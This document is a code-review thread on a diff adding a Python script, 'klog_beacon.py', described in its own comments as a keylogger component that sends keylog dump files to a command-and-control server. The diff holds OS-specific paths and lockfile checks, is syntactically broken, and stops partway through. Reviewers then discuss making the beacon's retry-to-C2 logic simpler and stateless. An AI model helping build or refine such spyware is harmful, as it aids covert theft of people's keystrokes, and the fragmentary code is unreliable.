klog_beacon.py

```diff
@@ -0,0 +1,61 @@
+import os
+import pathlib
+import sys
+import base64
+import requests
+from requests import api
+from pathlib import Path
+logfile = ''
+##Keylog dumpfile
+c2_url = ''
+##C2 to listen for the dump files
+blocked = False
+##Lockfiles are set for sessions persistent configs
+WINDOWS_LOCKFILE =
+LINUX_LOCKFILE = 
+
+if __name__ == "__main__":
+	##OS Name code indicates correct path of dumpfile
+	if(os.name == 'nt'):
+		logpath = pathlib.WindowsPath(logfile)
+		if(os.path.exists(WINDOWS_LOCKFILE) == True):
+			blocked = True;
+	if(os.name == 'posix'):
+		logpath = pathlib.PosixPath(logfile)
+		if(os.path.exists(LINUX_LOCKFILE) == True):
+			blocked = True;
+	##check if enpoint is live after last connection failed
+	if(blocked == True):
```

Comment:
Is this able to become unblocked?

Reply:
Do you need to block?
Would it be better to try, if it fails exit and the try again on the same cycle?

Would make it so you don't have to track state.

Reply:
You've got a Point, it's probably better to keep it simple, it really doesn't need this blocking capability